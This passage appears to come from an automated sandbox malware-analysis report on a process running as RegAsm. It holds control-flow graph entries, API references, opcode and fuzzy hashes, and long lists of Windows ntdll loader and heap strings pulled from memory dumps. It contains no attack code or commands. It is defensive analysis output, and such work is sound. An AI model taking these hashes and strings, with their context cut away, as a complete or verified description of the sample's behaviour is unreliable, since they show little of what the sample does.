                                                                                                                          • Instruction Fuzzy Hash: 59E06DB22002147BD614EE59DC42EAB37ADEFC4714F008419FE08A7242D671B91186B8

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 207 42d1f3-42d22f call 4048f3 call 42e073 ExitProcess
                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,A332A5E1,?,?,A332A5E1), ref: 0042D22A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: 1eeef9b814ce5dbdd2fbb078e5355fc083b491a19b32f4d566a365c0cc94f793
                                                                                                                          • Instruction ID: 7d087f7f5858adb128510598b6aeb75ad25227ba0282fc6dd19918f884fa539b
                                                                                                                          • Opcode Fuzzy Hash: 1eeef9b814ce5dbdd2fbb078e5355fc083b491a19b32f4d566a365c0cc94f793
                                                                                                                          • Instruction Fuzzy Hash: 09E08C762016147BE220FB5BDC01F9B77ACDFC5724F01452AFA08A7245CAB5BA0187F4

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 212 2f22c0a-2f22c0f 213 2f22c11-2f22c18 212->213 214 2f22c1f-2f22c26 LdrInitializeThunk 212->214
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 5ee08decdefa347cbea52a3358a1d89272ba2efaf5a2f28d132db80dcfe2ce6c
                                                                                                                          • Instruction ID: 41f314fb773ae8a090bf0bddadd86e51a4fdccf62d732d1cf0224bb2a6011989
                                                                                                                          • Opcode Fuzzy Hash: 5ee08decdefa347cbea52a3358a1d89272ba2efaf5a2f28d132db80dcfe2ce6c
                                                                                                                          • Instruction Fuzzy Hash: 8DB09B71D415D5D5DF11E7604A08717791067D1791F15C061E3034641E473CC1D5F175
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 0-2160512332
                                                                                                                          • Opcode ID: 24a83060657f6dadc0f63203f6dc58bf72f0d0debbd4c9c8a0919023a01b8b5a
                                                                                                                          • Instruction ID: 0271f9cb2088e98f377b166a62732c3e053d4d19453747ed8d957055a1756fe5
                                                                                                                          • Opcode Fuzzy Hash: 24a83060657f6dadc0f63203f6dc58bf72f0d0debbd4c9c8a0919023a01b8b5a
                                                                                                                          • Instruction Fuzzy Hash: 33926A71A48341ABE720DF24C888B6BB7E9FB84794F14492DFB95D7290D770E844CB92
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 0-3089669407
                                                                                                                          • Opcode ID: 33fba628de63cd22e377fbbea88c5ea64b0b33df962e020e4de49292a82b3cbb
                                                                                                                          • Instruction ID: fa14939c5d7855f438985703adc3aa14c97e144b3935d6e8355e0fd21c9a8127
                                                                                                                          • Opcode Fuzzy Hash: 33fba628de63cd22e377fbbea88c5ea64b0b33df962e020e4de49292a82b3cbb
                                                                                                                          • Instruction Fuzzy Hash: 858124B2D4221D6F9B12EBE4DDD0EEFB7BEAB047907545821FA01F7110E660DE158BA0
                                                                                                                          Strings
                                                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02F5540A, 02F55496, 02F55519
                                                                                                                          • Critical section address, xrefs: 02F55425, 02F554BC, 02F55534
                                                                                                                          • corrupted critical section, xrefs: 02F554C2
                                                                                                                          • Thread identifier, xrefs: 02F5553A
                                                                                                                          • undeleted critical section in freed memory, xrefs: 02F5542B
                                                                                                                          • double initialized or corrupted critical section, xrefs: 02F55508
                                                                                                                          • Critical section address., xrefs: 02F55502
                                                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 02F55543
                                                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02F554CE
                                                                                                                          • Invalid debug info address of this critical section, xrefs: 02F554B6
                                                                                                                          • Address of the debug info found in the active list., xrefs: 02F554AE, 02F554FA
                                                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02F554E2
                                                                                                                          • Critical section debug info address, xrefs: 02F5541F, 02F5552E
                                                                                                                          • 8, xrefs: 02F552E3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                          • API String ID: 0-2368682639
                                                                                                                          • Opcode ID: 246269b3e515fe5003e310fdbd5e64b550e4541a128dbc6d2101bb1506bb2cc7
                                                                                                                          • Instruction ID: 9f4c076fb0d1521880f56d4171027b6627202089d033cbcc778166cf5a7c799c
                                                                                                                          • Opcode Fuzzy Hash: 246269b3e515fe5003e310fdbd5e64b550e4541a128dbc6d2101bb1506bb2cc7
                                                                                                                          • Instruction Fuzzy Hash: CE81C071E80358EFEB10CF99CA40BAEBBB6BB09754F609119FA05B7640C375A941CB50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                          • API String ID: 0-360209818
                                                                                                                          • Opcode ID: b919edc3b9ccba4caedb2f574a046b54ee452a9f0dd53e03d58398b971f713a1
                                                                                                                          • Instruction ID: bd850836cb64ce935d3fc9f7579a1517b744db4fc9cccb31fc9bf4be637185fb
                                                                                                                          • Opcode Fuzzy Hash: b919edc3b9ccba4caedb2f574a046b54ee452a9f0dd53e03d58398b971f713a1
                                                                                                                          • Instruction Fuzzy Hash: D46281B5E002298FDB34CF18C8407AAB7B6AF95354F5582DADA4DAB240D7726AD1CF40
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                          • API String ID: 0-3591852110
                                                                                                                          • Opcode ID: 2b1d94a433b12ba16b158976a8669836f4c87c38560b1413703f47f73e6531bf
                                                                                                                          • Instruction ID: a4908f254fd7ea1e937d9c1037eda0eeb48357b7dd2fb88dbee67cf4c30f58e2
                                                                                                                          • Opcode Fuzzy Hash: 2b1d94a433b12ba16b158976a8669836f4c87c38560b1413703f47f73e6531bf
                                                                                                                          • Instruction Fuzzy Hash: 9412AF31A40646DFEB259F28C441BB7B7F2EF09798F15846DE68A8B641D734E881CB50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                          • API String ID: 0-3197712848
                                                                                                                          • Opcode ID: aa6d4ccaf59a6fb71ac6833df3370a9689c05c0d8b6d45afd1a6a3a3c3e21310
                                                                                                                          • Instruction ID: 4fa085c98f9622e32b232de9fe3d7725227c4cb358315e612a93f9339bb8faef
                                                                                                                          • Opcode Fuzzy Hash: aa6d4ccaf59a6fb71ac6833df3370a9689c05c0d8b6d45afd1a6a3a3c3e21310
                                                                                                                          • Instruction Fuzzy Hash: 9612F572A493458FD364DF24C840BAAB7E5BF84788F05992DFA898F380E770D944CB52
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                          • API String ID: 0-3532704233
                                                                                                                          • Opcode ID: 41f9ee990a585efe0cd780f5ab33c73b17100e318e79af6769773c5430316078
                                                                                                                          • Instruction ID: 2ce7872e066111bb5d21bad9045f40062a58d6820a67b4ecd17a66326acb82e8
                                                                                                                          • Opcode Fuzzy Hash: 41f9ee990a585efe0cd780f5ab33c73b17100e318e79af6769773c5430316078
                                                                                                                          • Instruction Fuzzy Hash: 0DB1BE729483519FC725CF24C890B6BB7E8AF84748F01992EFA99D7240D730D94ACF92
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                          • API String ID: 0-1357697941
                                                                                                                          • Opcode ID: 424799907d4c03e9a72823b47692c612dba1c63af33646b4670c64e92dea70de
                                                                                                                          • Instruction ID: 05a9a924b517c0c3955a32efd21a9e63d2ee19edc54b5a09cd57a4792329ea13
                                                                                                                          • Opcode Fuzzy Hash: 424799907d4c03e9a72823b47692c612dba1c63af33646b4670c64e92dea70de
                                                                                                                          • Instruction Fuzzy Hash: F6F1E231A40686EFEF25DF68C440BAABBF6FF09748F04805DE6869B251DB31A945CF50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                          • API String ID: 0-3063724069
                                                                                                                          • Opcode ID: 28b07fef33a65f98d7f515aba890c495633f8a62b0530b458e7446db5d0a9e10
                                                                                                                          • Instruction ID: eae740f64bc5025e0411b3e1c27aa16492e07af7fe35949bb7860e4e18584aa5
                                                                                                                          • Opcode Fuzzy Hash: 28b07fef33a65f98d7f515aba890c495633f8a62b0530b458e7446db5d0a9e10
                                                                                                                          • Instruction Fuzzy Hash: 2DD1D372804395ABD721DF54CC80B6BB7E9AF84798F044A2EFB84A7250D7B0C944CF92
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                          • API String ID: 0-1700792311
                                                                                                                          • Opcode ID: d8857814b88a4167a641b62a47dba55339e3844bf38996618cb50dea1c77fe62
                                                                                                                          • Instruction ID: 405850371da2db1e94e4ebaf9ca053ca58f26d943383205abc2128f7c8553995
                                                                                                                          • Opcode Fuzzy Hash: d8857814b88a4167a641b62a47dba55339e3844bf38996618cb50dea1c77fe62
                                                                                                                          • Instruction Fuzzy Hash: 37D1CD31A41689DFEF12DF68C440AADBBF2FF4A794F08805DE6469B251DB349981CF11
                                                                                                                          Strings
                                                                                                                          • @, xrefs: 02EDD2AF
                                                                                                                          • @, xrefs: 02EDD313
                                                                                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 02EDD262
                                                                                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 02EDD196
                                                                                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 02EDD146
                                                                                                                          • @, xrefs: 02EDD0FD
                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 02EDD2C3
                                                                                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02EDD0CF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                          • API String ID: 0-1356375266
                                                                                                                          • Opcode ID: 246d1d1ac5d8f95a0b1e726611e5bb3bcc632415e728922419ea80562aeffbfd
                                                                                                                          • Instruction ID: 6d2980694c1967a0c41f8a31bc0525c8b0ea6fbfa013535461accd42d10fa812
                                                                                                                          • Opcode Fuzzy Hash: 246d1d1ac5d8f95a0b1e726611e5bb3bcc632415e728922419ea80562aeffbfd
                                                                                                                          • Instruction Fuzzy Hash: B0A173729483559FE721CF25C880BABB7E8FF84759F00892DFA8896240D774D909CF52
                                                                                                                          Strings
                                                                                                                          • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 02F476EE
                                                                                                                          • Internal error check failed, xrefs: 02F47718, 02F478A9
                                                                                                                          • Status != STATUS_NOT_FOUND, xrefs: 02F4789A
                                                                                                                          • sxsisol_SearchActCtxForDllName, xrefs: 02F476DD
                                                                                                                          • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 02F47709
                                                                                                                          • minkernel\ntdll\sxsisol.cpp, xrefs: 02F47713, 02F478A4
                                                                                                                          • @, xrefs: 02EF9EE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                          • API String ID: 0-761764676
                                                                                                                          • Opcode ID: aead277c7f64216c6432522ad0839d2c2ed3573aace173d53d0695500eb19c16
                                                                                                                          • Instruction ID: b0b8413732359d188925bb3f3fcdc41ea6f80058d02d920f1f5b541d91b43c5d
                                                                                                                          • Opcode Fuzzy Hash: aead277c7f64216c6432522ad0839d2c2ed3573aace173d53d0695500eb19c16
                                                                                                                          • Instruction Fuzzy Hash: 2F128E71E002198BDB64DFA9C880BFEB7B5FF08754F159069EA49EB341E7749841CB60
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                          • API String ID: 0-1109411897
                                                                                                                          • Opcode ID: acdab11743741fcc1e4e671469f399e678db4681ac69aab353550d50572c7fb2
                                                                                                                          • Instruction ID: d7634f5990b593cfb070e232e8ca4070b794fae02ae026e806f802717dd201ba
                                                                                                                          • Opcode Fuzzy Hash: acdab11743741fcc1e4e671469f399e678db4681ac69aab353550d50572c7fb2
                                                                                                                          • Instruction Fuzzy Hash: 97A25A70E056698FDF64DF14CD98BA9BBB1AF45358F1482E9D90EA7290DB709E81CF00
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-523794902
                                                                                                                          • Opcode ID: 1d5e35924d945eccafa0f40d98bcd5f6ec28095f3e9529bac73be9ee25cb9006
                                                                                                                          • Instruction ID: 67fcd57578ec4cdaccc7fe584e827a219971fa7bca2ab58be80c0455100ae71f
                                                                                                                          • Opcode Fuzzy Hash: 1d5e35924d945eccafa0f40d98bcd5f6ec28095f3e9529bac73be9ee25cb9006
                                                                                                                          • Instruction Fuzzy Hash: E542ED716483819FD716DF28C880B6ABBE6BF84348F04996DF986CB751D734D842CB52
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                          • API String ID: 0-4098886588
                                                                                                                          • Opcode ID: c69e1a1cdbbe236a36c6c3f5ff74f2b201a68ec80de58fd3467bf464ad047f1b
                                                                                                                          • Instruction ID: 24cc281b87f693981fb5b4c6d7e7fa70d2040f3773afafcc80e6bbad563cd267
                                                                                                                          • Opcode Fuzzy Hash: c69e1a1cdbbe236a36c6c3f5ff74f2b201a68ec80de58fd3467bf464ad047f1b
                                                                                                                          • Instruction Fuzzy Hash: 4432BF71E80269CBDF21CB14C894BEEBBB5BF44348F1491E9E94AA7250DB719E81CF50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                          • API String ID: 0-122214566
                                                                                                                          • Opcode ID: 2f338006ebd5bd64768effc82cc5440ed8941e9bdcc56b757e9394a2eeaab669
                                                                                                                          • Instruction ID: 0558d490c56aa3a05daa6171751647cd379cba5c252ebb2631d10008f13c0f3c
                                                                                                                          • Opcode Fuzzy Hash: 2f338006ebd5bd64768effc82cc5440ed8941e9bdcc56b757e9394a2eeaab669
                                                                                                                          • Instruction Fuzzy Hash: 12C14B31E812159BDB648F64CC807BEBB65AF4934CF14E06DEB06AB290EBB4D944C790
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 0-792281065
                                                                                                                          • Opcode ID: 82ac987eb40857a358d229610d24621f3bf71168d6ea44bc36f01030f6dc94a6
                                                                                                                          • Instruction ID: b45f2f7ed1525aa2669c87a9012b3db4575510a99c3136c0df6ef38cfcee2392
                                                                                                                          • Opcode Fuzzy Hash: 82ac987eb40857a358d229610d24621f3bf71168d6ea44bc36f01030f6dc94a6
                                                                                                                          • Instruction Fuzzy Hash: 1B914631F813389BEB25DF64DD45BAA77A6AF01BD8F544128EF02EB280D7709841CB90
                                                                                                                          Strings
                                                                                                                          • LdrpInitializeProcess, xrefs: 02F1C6C4
                                                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 02F58170
                                                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 02F581E5
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 02F1C6C3
                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 02F58181, 02F581F5
                                                                                                                          • LdrpInitializeImportRedirection, xrefs: 02F58177, 02F581EB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                          • API String ID: 0-475462383
                                                                                                                          • Opcode ID: 66568d672fcb77513060b2c51264f1d5965ef085e36a3f6eb0b065b2d0279137
                                                                                                                          • Instruction ID: 30165aaa18bc3c9acd5d4eb10b1d15e23ef64c4e36db5132b20427299ff17e45
                                                                                                                          • Opcode Fuzzy Hash: 66568d672fcb77513060b2c51264f1d5965ef085e36a3f6eb0b065b2d0279137
                                                                                                                          • Instruction Fuzzy Hash: 14312771B843559BD310EF28DD45E2AB7A6EF84B94F044958FB85AB2D0D720DC05CFA2
                                                                                                                          Strings
                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02F521BF
                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 02F52165
                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02F52178
                                                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 02F52160, 02F5219A, 02F521BA
                                                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02F5219F
                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02F52180
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                          • API String ID: 0-861424205
                                                                                                                          • Opcode ID: 6b78d1616ec960a94ad59bf861155221d8d2b989bffc00b70117069e72a74047
                                                                                                                          • Instruction ID: 29f4e3fc74d7b689e279a2a3c6794644963d1e84ca3123e1a6ea77c62ef010c5
                                                                                                                          • Opcode Fuzzy Hash: 6b78d1616ec960a94ad59bf861155221d8d2b989bffc00b70117069e72a74047
                                                                                                                          • Instruction Fuzzy Hash: 7C310232F802346BFB218AD69C85F6BB769DF54AD4F154159BF05BB241D2709E01CBA0
                                                                                                                          Strings
